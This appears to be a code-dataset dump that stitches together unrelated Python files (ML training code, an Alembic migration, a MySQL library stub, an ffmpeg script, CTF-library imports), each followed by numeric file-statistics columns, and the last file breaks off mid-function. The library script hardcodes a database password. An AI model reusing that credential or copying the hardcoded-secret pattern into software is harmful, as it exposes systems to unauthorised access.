save_checkpoint(state, epoch, logger, config.model_path, config.ckpt)
od = OrderedDict()
od['Epoch'] = epoch + 1
od['best_epoch'] = best_epoch
od['train_loss_epoch'] = loss_total / len(input_lengths)
od['min_train_loss'] = min_train_loss
od['train_acc_epoch'] = float(train_value_ac) / train_eval_total
od['max_train_acc'] = max_train_acc
od['val_acc_epoch'] = float(value_ac) / eval_total
od['equation_acc_epoch'] = float(equation_ac) / eval_total
od['max_val_acc'] = max_val_acc
od['equation_acc'] = eq_acc
print_log(logger, od)
logger.debug('Validation Completed...\nTime Taken: {}'.format(time_since(time.time() - start)))
if config.results:
store_results(config, max_train_acc, max_val_acc, eq_acc, min_train_loss, best_epoch)
logger.info('Scores saved at {}'.format(config.result_path))
else:
gpu = config.gpu
mode = config.mode
dataset = config.dataset
batch_size = config.batch_size
old_run_name = config.run_name
with open(config_file, 'rb') as f:
config = AttrDict(pickle.load(f))
config.gpu = gpu
config.mode = mode
config.dataset = dataset
config.batch_size = batch_size
logger.info('Initializing Models...')
# Initialize models
embedding = None
if config.embedding == 'bert':
embedding = BertEncoder(config.emb_name, device, config.freeze_emb)
elif config.embedding == 'roberta':
embedding = RobertaEncoder(config.emb_name, device, config.freeze_emb)
else:
embedding = Embedding(config, input_lang, input_size=input_lang.n_words, embedding_size=config.embedding_size, dropout=config.dropout)
# encoder = EncoderSeq(input_size=input_lang.n_words, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
encoder = EncoderSeq(cell_type=config.cell_type, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
predict = Prediction(hidden_size=config.hidden_size, op_nums=output_lang.n_words - config.copy_nums - 1 - config.len_generate_nums, input_size=config.len_generate_nums, dropout=config.dropout)
generate = GenerateNode(hidden_size=config.hidden_size, op_nums=output_lang.n_words - config.copy_nums - 1 - config.len_generate_nums, embedding_size=config.embedding_size, dropout=config.dropout)
merge = Merge(hidden_size=config.hidden_size, embedding_size=config.embedding_size, dropout=config.dropout)
# the embedding layer is only for generated number embeddings, operators, and paddings
logger.debug('Models Initialized')
epoch_offset, min_train_loss, max_train_acc, max_val_acc, equation_acc, best_epoch, generate_nums = load_checkpoint(config, embedding, encoder, predict, generate, merge, config.mode, checkpoint, logger, device)
logger.info('Prediction from')
od = OrderedDict()
od['epoch'] = epoch_offset
od['min_train_loss'] = min_train_loss
od['max_train_acc'] = max_train_acc
od['max_val_acc'] = max_val_acc
od['equation_acc'] = equation_acc
od['best_epoch'] = best_epoch
print_log(logger, od)
generate_num_ids = []
for num in generate_nums:
generate_num_ids.append(output_lang.word2index[num])
value_ac = 0
equation_ac = 0
eval_total = 0
start = time.time()
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('---------------------------------------\n')
f_out.write('Test Name: ' + old_run_name + '\n')
f_out.write('---------------------------------------\n')
test_res_ques, test_res_act, test_res_gen, test_res_scores = [], [], [], []
ex_num = 0
for test_batch in test_pairs:
batch_graph = get_single_example_graph(test_batch[0], test_batch[1], test_batch[7], test_batch[4], test_batch[5])
test_res = evaluate_tree(config, test_batch[0], test_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, test_batch[4], test_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
val_ac, equ_ac, _, _ = compute_prefix_tree_result(test_res, test_batch[2], output_lang, test_batch[4], test_batch[6])
cur_result = 0
if val_ac:
value_ac += 1
cur_result = 1
if equ_ac:
equation_ac += 1
eval_total += 1
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('Example: ' + str(ex_num) + '\n')
f_out.write('Source: ' + stack_to_string(sentence_from_indexes(input_lang, test_batch[0])) + '\n')
f_out.write('Target: ' + stack_to_string(sentence_from_indexes(output_lang, test_batch[2])) + '\n')
f_out.write('Generated: ' + stack_to_string(sentence_from_indexes(output_lang, test_res)) + '\n')
if config.nums_disp:
src_nums = len(test_batch[4])
tgt_nums = 0
pred_nums = 0
for k_tgt in sentence_from_indexes(output_lang, test_batch[2]):
if k_tgt not in ['+', '-', '*', '/']:
tgt_nums += 1
for k_pred in sentence_from_indexes(output_lang, test_res):
if k_pred not in ['+', '-', '*', '/']:
pred_nums += 1
f_out.write('Numbers in question: ' + str(src_nums) + '\n')
f_out.write('Numbers in Target Equation: ' + str(tgt_nums) + '\n')
f_out.write('Numbers in Predicted Equation: ' + str(pred_nums) + '\n')
f_out.write('Result: ' + str(cur_result) + '\n' + '\n')
# collect per-example strings and scores for the results CSV written after the loop
test_res_ques.append(stack_to_string(sentence_from_indexes(input_lang, test_batch[0])))
test_res_act.append(stack_to_string(sentence_from_indexes(output_lang, test_batch[2])))
test_res_gen.append(stack_to_string(sentence_from_indexes(output_lang, test_res)))
test_res_scores.append(cur_result)
ex_num += 1
results_df = pd.DataFrame([test_res_ques, test_res_act, test_res_gen, test_res_scores]).transpose()
results_df.columns = ['Question', 'Actual Equation', 'Generated Equation', 'Score']
csv_file_path = os.path.join(config.outputs_path, config.dataset+'.csv')
results_df.to_csv(csv_file_path, index = False)
logger.info('Accuracy: {}'.format(sum(test_res_scores)/len(test_res_scores)))
if __name__ == '__main__':
main()
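A minimal sketch of the checkpoint convention implied by the `state` dictionary assembled above, assuming a plain torch.save / torch.load round trip; the repository's actual save_checkpoint / load_checkpoint helpers may add fields or use a different file layout, so treat this as illustrative only.
import os
import torch

def save_checkpoint_sketch(state, epoch, model_path, ckpt_name):
    # Persist the full training state: module weights, optimizer and scheduler states,
    # both vocabularies, and the running accuracy/loss bookkeeping.
    os.makedirs(model_path, exist_ok=True)
    torch.save(state, os.path.join(model_path, '{}_{}.pt'.format(ckpt_name, epoch)))

def load_checkpoint_sketch(path, embedding, encoder, predict, generate, merge, device):
    # Restore the module weights saved above; optimizer and scheduler states would be
    # restored from their *_optimizer_state_dict / *_scheduler_state_dict entries
    # in exactly the same way.
    state = torch.load(path, map_location=device)
    embedding.load_state_dict(state['embedding_state_dict'])
    encoder.load_state_dict(state['encoder_state_dict'])
    predict.load_state_dict(state['predict_state_dict'])
    generate.load_state_dict(state['generate_state_dict'])
    merge.load_state_dict(state['merge_state_dict'])
    return state['epoch'], state['max_val_acc'], state['generate_nums']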
| 41.673292
| 235
| 0.707902
| 4,778
| 33,547
| 4.653411
| 0.067183
| 0.024287
| 0.014977
| 0.012144
| 0.879869
| 0.869839
| 0.868445
| 0.867005
| 0.863857
| 0.863857
| 0
| 0.009023
| 0.160879
| 33,547
| 805
| 236
| 41.673292
| 0.780817
| 0.015829
| 0
| 0.799073
| 0
| 0
| 0.119556
| 0.024585
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006182
| false
| 0
| 0.026275
| 0
| 0.037094
| 0.010819
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ee06a15aa02924927d221fd47c5a39ee208a88a
| 200
|
py
|
Python
|
shapreg/__init__.py
|
iancovert/shapley-regression
|
ea7d149d92408c8b219fc7b37ff2e71fc22050dc
|
[
"MIT"
] | 26
|
2020-11-23T12:27:59.000Z
|
2022-03-27T07:24:08.000Z
|
shapreg/__init__.py
|
iancovert/shapley-regression
|
ea7d149d92408c8b219fc7b37ff2e71fc22050dc
|
[
"MIT"
] | 1
|
2021-04-04T20:54:53.000Z
|
2021-04-13T21:30:58.000Z
|
shapreg/__init__.py
|
iancovert/shapley-regression
|
ea7d149d92408c8b219fc7b37ff2e71fc22050dc
|
[
"MIT"
] | 6
|
2021-04-11T10:13:11.000Z
|
2021-12-28T22:28:52.000Z
|
from . import removal
from . import games
from . import stochastic_games
from . import shapley
from . import shapley_unbiased
from . import shapley_sampling
from . import plotting
from . import utils
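The module above only re-exports subpackages; a one-line sketch of what that buys a consumer (nothing beyond the import surface shown here is assumed):
from shapreg import games, shapley, plotting  # subpackages become importable from the top level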
| 22.222222
| 30
| 0.8
| 27
| 200
| 5.814815
| 0.37037
| 0.509554
| 0.324841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 200
| 8
| 31
| 25
| 0.934524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5ef7a93ff79f6765d91999e49718cee7d30edaf4
| 63
|
py
|
Python
|
toyotama/pwn/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/pwn/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/pwn/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | 1
|
2021-07-10T03:52:35.000Z
|
2021-07-10T03:52:35.000Z
|
from toyotama.pwn.fsa import *
from toyotama.pwn.util import *
| 21
| 31
| 0.777778
| 10
| 63
| 4.9
| 0.6
| 0.489796
| 0.612245
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 32
| 31.5
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f2f4d1a4b2b91f2edd545a3befebd766cb122c2
| 2,059
|
py
|
Python
|
BookReturnRecords1.py
|
XQuickmathsX/library-management-oncemore
|
e4e1650ebf40c63f9ed0aa0893cec010aebb0e76
|
[
"MIT"
] | null | null | null |
BookReturnRecords1.py
|
XQuickmathsX/library-management-oncemore
|
e4e1650ebf40c63f9ed0aa0893cec010aebb0e76
|
[
"MIT"
] | null | null | null |
BookReturnRecords1.py
|
XQuickmathsX/library-management-oncemore
|
e4e1650ebf40c63f9ed0aa0893cec010aebb0e76
|
[
"MIT"
] | null | null | null |
import mysql.connector
mydb = mysql.connector.connect(host="127.0.0.1", user="root", passwd="2zkNKcz&EOZaRjc$", database="library_management_project")
def returneestudentadd():
Borrowers_IDp=int(input("ENTER YOUR BORROWERS_ID:- "))
#todo query to add this expression into the database
bookIDp=int(input("ENTER YOUR BOOK'S ID:- "))
#todo query to add this expression into the database
bktitlep=input("ENTER YOUR BOOK'S TITLE/NAME:- ")
#todo query to add this expression into the database
studIDp=input("ENTER YOUR STUDENT_ID:- ")
#todo query to add this expression into the database
stfnamep=input("ENTER YOUR FIRST NAME:- ")
#todo query to add this expression into the database
releaseDatep=int(input("ENTER RELEASE DATE(MMDDYYYY):- "))
#todo query to add this expression into the database
duedatep=int(input("ENTER YOUR DUE DATE(MMDDYYYY):- "))
#todo query to add this expression into the database
bkdatereturnp=int(input("ENTER THE BOOK RETURN DATE(MMDDYYYY)"))
#todo query to add this expression into the database
def returneestaffadd():
Borrowers_IDp=int(input("ENTER YOUR BORROWERS_ID:- "))
#todo query to update this expression into the database
bookIDp=int(input("ENTER YOUR BOOK'S ID:- "))
#todo query to update this expression into the database
bktitlep=input("ENTER YOUR BOOK'S TITLE/NAME:- ")
#todo query to update this expression into the database
staffIDp=input("ENTER YOUR STUDENT_ID:- ")
#todo query to update this expression into the database
stffnamep=input("ENTER YOUR FIRST NAME:- ")
#todo query to update this expression into the database
releaseDatep=int(input("ENTER RELEASE DATE(MMDDYYYY):- "))
#todo query to update this expression into the database
duedatep=int(input("ENTER YOUR DUE DATE(MMDDYYYY):- "))
#todo query to update this expression into the database
bkdatereturnp=int(input("ENTER THE BOOK RETURN DATE(MMDDYYYY)"))
#todo query to update this expression into the database
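Every `#todo query ...` comment above asks for the collected values to be written to the database. A hedged sketch of one such insert using mysql.connector's cursor API with a parameterized statement; the table and column names (book_return_records, borrowers_id, ...) are hypothetical, since the real schema is not shown in this file.
def insert_return_record_sketch(mydb, borrowers_id, book_id, book_title, return_date):
    # Parameterized INSERT: mysql.connector substitutes the %s placeholders safely,
    # avoiding string concatenation of user input.
    cursor = mydb.cursor()
    cursor.execute(
        "INSERT INTO book_return_records (borrowers_id, book_id, book_title, return_date) "
        "VALUES (%s, %s, %s, %s)",
        (borrowers_id, book_id, book_title, return_date),
    )
    mydb.commit()  # make the row visible outside this connection
    cursor.close()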
| 57.194444
| 118
| 0.716853
| 288
| 2,059
| 5.097222
| 0.194444
| 0.108992
| 0.119891
| 0.228883
| 0.877384
| 0.877384
| 0.877384
| 0.877384
| 0.822888
| 0.822888
| 0
| 0.004194
| 0.189412
| 2,059
| 36
| 119
| 57.194444
| 0.875374
| 0.407965
| 0
| 0.6
| 0
| 0
| 0.435415
| 0.022241
| 0
| 0
| 0
| 0.027778
| 0
| 1
| 0.1
| false
| 0.05
| 0.05
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f52ff6b2dc7006d52ca2f1707dd4d5fd9355637
| 1,375
|
py
|
Python
|
draw_video.py
|
lidongyv/Reppoint-Tracking
|
81b81e921f6b905e68aba117ffc4fca8ffcfcfd6
|
[
"MIT"
] | null | null | null |
draw_video.py
|
lidongyv/Reppoint-Tracking
|
81b81e921f6b905e68aba117ffc4fca8ffcfcfd6
|
[
"MIT"
] | null | null | null |
draw_video.py
|
lidongyv/Reppoint-Tracking
|
81b81e921f6b905e68aba117ffc4fca8ffcfcfd6
|
[
"MIT"
] | null | null | null |
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import os
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
import ffmpeg
path='/home/ld/RepPoints/debug/feature_change/1'
# (
# ffmpeg
# .input(os.path.join(path,'resnet/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'resnet.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'stsn_r/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'stsn_r.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'stsn_s/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'stsn_s.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'init_rep/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'init_rep.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'refine_rep/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'refine_rep.mp4'))
# .run()
# )
(
ffmpeg
.input(os.path.join(path,'agg_f/*.jpg'), pattern_type='glob', framerate=10)
.output(os.path.join(path,'agg_f.mp4'))
.run()
)
(
ffmpeg
.input(os.path.join(path,'support_f/*.jpg'), pattern_type='glob', framerate=10)
.output(os.path.join(path,'support_f.mp4'))
.run()
)
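The five commented-out blocks and the two active ones above repeat the same three ffmpeg-python calls. A sketch that folds them into a single loop, using only the calls already present (input with pattern_type='glob', output, run) and assuming each listed subdirectory of `path` exists:
for name in ['resnet', 'stsn_r', 'stsn_s', 'init_rep', 'refine_rep', 'agg_f', 'support_f']:
    (
        ffmpeg
        .input(os.path.join(path, name, '*.jpg'), pattern_type='glob', framerate=10)
        .output(os.path.join(path, name + '.mp4'))
        .run()
    )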
| 25.462963
| 86
| 0.626182
| 197
| 1,375
| 4.263959
| 0.218274
| 0.1
| 0.166667
| 0.233333
| 0.878571
| 0.864286
| 0.779762
| 0.779762
| 0.705952
| 0.541667
| 0
| 0.020906
| 0.165091
| 1,375
| 53
| 87
| 25.943396
| 0.710801
| 0.560727
| 0
| 0.380952
| 0
| 0
| 0.169284
| 0.071553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.380952
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6f77d134e788eb011a09e7bf579c6eda6ffabfb9
| 129
|
py
|
Python
|
malesmo/gboost/__init__.py
|
loven-doo/MaLeSMo
|
555ce22c2ef6dfe78af6717b502d9274a4faa743
|
[
"BSD-3-Clause"
] | null | null | null |
malesmo/gboost/__init__.py
|
loven-doo/MaLeSMo
|
555ce22c2ef6dfe78af6717b502d9274a4faa743
|
[
"BSD-3-Clause"
] | null | null | null |
malesmo/gboost/__init__.py
|
loven-doo/MaLeSMo
|
555ce22c2ef6dfe78af6717b502d9274a4faa743
|
[
"BSD-3-Clause"
] | null | null | null |
from malesmo.gboost.model_catb import ModelCatBoost, CatBoostParams
from malesmo.gboost.model_xgb import ModelXGB, XGBoostParams
| 43
| 67
| 0.875969
| 16
| 129
| 6.9375
| 0.6875
| 0.198198
| 0.306306
| 0.396396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077519
| 129
| 2
| 68
| 64.5
| 0.932773
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
48c2c3b75988ca92a23b7d93b799018e2471db42
| 7,444
|
py
|
Python
|
migrations/versions/d709caf1aef0_.py
|
CatsAreEvil/box-office-studio
|
0fcf19ccd4f65622d94c6cf0c6ac2ef4fd1bd5f8
|
[
"MIT"
] | null | null | null |
migrations/versions/d709caf1aef0_.py
|
CatsAreEvil/box-office-studio
|
0fcf19ccd4f65622d94c6cf0c6ac2ef4fd1bd5f8
|
[
"MIT"
] | 1
|
2019-06-12T01:25:39.000Z
|
2019-06-12T01:25:40.000Z
|
migrations/versions/d709caf1aef0_.py
|
CatsAreEvil/box-office-studio
|
0fcf19ccd4f65622d94c6cf0c6ac2ef4fd1bd5f8
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: d709caf1aef0
Revises: 0682670d8b62
Create Date: 2019-05-25 19:21:03.965915
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'd709caf1aef0'
down_revision = '0682670d8b62'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('results', sa.Column('movie', sa.String(), nullable=True))
op.add_column('results', sa.Column('movie_gross', sa.Float(), nullable=True))
op.drop_column('results', 'movie_10_results')
op.drop_column('results', 'movie_2_results')
op.drop_column('results', 'movie_15_results')
op.drop_column('results', 'movie_17_results')
op.drop_column('results', 'movie_11')
op.drop_column('results', 'movie_12_results')
op.drop_column('results', 'movie_1_results')
op.drop_column('results', 'movie_7_results')
op.drop_column('results', 'movie_18')
op.drop_column('results', 'movie_12')
op.drop_column('results', 'movie_14_results')
op.drop_column('results', 'movie_4')
op.drop_column('results', 'movie_5_results')
op.drop_column('results', 'movie_4_results')
op.drop_column('results', 'movie_3')
op.drop_column('results', 'movie_11_results')
op.drop_column('results', 'movie_17')
op.drop_column('results', 'movie_6')
op.drop_column('results', 'movie_6_results')
op.drop_column('results', 'movie_10')
op.drop_column('results', 'movie_20')
op.drop_column('results', 'movie_16')
op.drop_column('results', 'movie_19')
op.drop_column('results', 'movie_8_results')
op.drop_column('results', 'movie_13')
op.drop_column('results', 'movie_19_results')
op.drop_column('results', 'movie_7')
op.drop_column('results', 'movie_16_results')
op.drop_column('results', 'movie_1')
op.drop_column('results', 'movie_20_results')
op.drop_column('results', 'movie_2')
op.drop_column('results', 'movie_3_results')
op.drop_column('results', 'movie_14')
op.drop_column('results', 'movie_15')
op.drop_column('results', 'movie_13_results')
op.drop_column('results', 'movie_9')
op.drop_column('results', 'movie_18_results')
op.drop_column('results', 'movie_5')
op.drop_column('results', 'movie_9_results')
op.drop_column('results', 'movie_8')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('results', sa.Column('movie_8', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_9_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_5', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_18_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_9', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_13_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_15', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_14', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_3_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_2', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_20_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_1', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_16_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_7', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_19_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_13', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_8_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_19', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_16', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_20', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_10', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_6_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_6', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_17', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_11_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_3', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_4_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_5_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_4', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_14_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_12', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_18', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_7_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_1_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_12_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_11', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_17_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_15_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_2_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_10_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.drop_column('results', 'movie_gross')
op.drop_column('results', 'movie')
# ### end Alembic commands ###
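After upgrade() runs, the `results` table keeps a single (movie, movie_gross) pair instead of twenty movie_N / movie_N_results column pairs. A hedged sketch of the SQLAlchemy model that state implies; the class name, base, and primary key are assumptions, since the application's real model is not part of this migration file.
from sqlalchemy import Column, Float, Integer, String
from sqlalchemy.orm import declarative_base

Base = declarative_base()

class Results(Base):
    __tablename__ = 'results'
    id = Column(Integer, primary_key=True)      # assumed surrogate key
    movie = Column(String, nullable=True)       # added by upgrade()
    movie_gross = Column(Float, nullable=True)  # added by upgrade()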
| 67.063063
| 138
| 0.738716
| 1,003
| 7,444
| 5.254237
| 0.077767
| 0.207211
| 0.087666
| 0.143454
| 0.933966
| 0.929412
| 0.774573
| 0.702467
| 0.702087
| 0.693928
| 0
| 0.031878
| 0.0982
| 7,444
| 110
| 139
| 67.672727
| 0.753166
| 0.039629
| 0
| 0
| 0
| 0
| 0.220472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021505
| false
| 0
| 0.032258
| 0
| 0.053763
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48f8b600685f4396a53a8c75ec94c48c550d5661
| 2,942
|
py
|
Python
|
Model/models.py
|
tarun360/SpeakerProfiling
|
61a033aed07e89d94e18d89393e11b43862933ab
|
[
"MIT"
] | 6
|
2022-01-10T11:30:52.000Z
|
2022-01-11T05:29:25.000Z
|
Model/models.py
|
tarun360/SpeakerProfiling
|
61a033aed07e89d94e18d89393e11b43862933ab
|
[
"MIT"
] | null | null | null |
Model/models.py
|
tarun360/SpeakerProfiling
|
61a033aed07e89d94e18d89393e11b43862933ab
|
[
"MIT"
] | 2
|
2022-01-13T05:20:07.000Z
|
2022-03-23T12:05:41.000Z
|
import torch
import torch.nn as nn
from conformer.encoder import ConformerEncoder
from IPython import embed
class UpstreamTransformer(nn.Module):
def __init__(self, upstream_model='wav2vec2',num_layers=6, feature_dim=768, unfreeze_last_conv_layers=False):
super().__init__()
self.upstream = torch.hub.load('s3prl/s3prl', upstream_model)
# Selecting the 9th encoder layer (out of 12)
self.upstream.model.encoder.layers = self.upstream.model.encoder.layers[0:9]
for param in self.upstream.parameters():
param.requires_grad = False
if unfreeze_last_conv_layers:
for param in self.upstream.model.feature_extractor.conv_layers[5:].parameters():
param.requires_grad = True
encoder_layer = torch.nn.TransformerEncoderLayer(d_model=feature_dim, nhead=8, batch_first=True)
self.transformer_encoder = torch.nn.TransformerEncoder(encoder_layer, num_layers=num_layers)
self.height_regressor = nn.Linear(feature_dim, 1)
self.age_regressor = nn.Linear(feature_dim, 1)
self.gender_classifier = nn.Sequential(
nn.Linear(feature_dim, 1),
nn.Sigmoid()
)
def forward(self, x):
x = [wav for wav in x.squeeze(1)]
x = self.upstream(x)['last_hidden_state']
output = self.transformer_encoder(x)
output_averaged = torch.mean(output, dim=1)
height = self.height_regressor(output_averaged)
age = self.age_regressor(output_averaged)
gender = self.gender_classifier(output_averaged)
return height, age, gender
# height only models
class UpstreamTransformerH(nn.Module):
def __init__(self, upstream_model='wav2vec2',num_layers=6, feature_dim=768, unfreeze_last_conv_layers=False):
super().__init__()
self.upstream = torch.hub.load('s3prl/s3prl', upstream_model)
# Selecting the 9th encoder layer (out of 12)
self.upstream.model.encoder.layers = self.upstream.model.encoder.layers[0:9]
for param in self.upstream.parameters():
param.requires_grad = False
if unfreeze_last_conv_layers:
for param in self.upstream.model.feature_extractor.conv_layers[5:].parameters():
param.requires_grad = True
encoder_layer = torch.nn.TransformerEncoderLayer(d_model=feature_dim, nhead=8, batch_first=True)
self.transformer_encoder = torch.nn.TransformerEncoder(encoder_layer, num_layers=num_layers)
self.height_regressor = nn.Linear(feature_dim, 1)
def forward(self, x):
x = [wav for wav in x.squeeze(1)]
x = self.upstream(x)['last_hidden_state']
output = self.transformer_encoder(x)
output_averaged = torch.mean(output, dim=1)
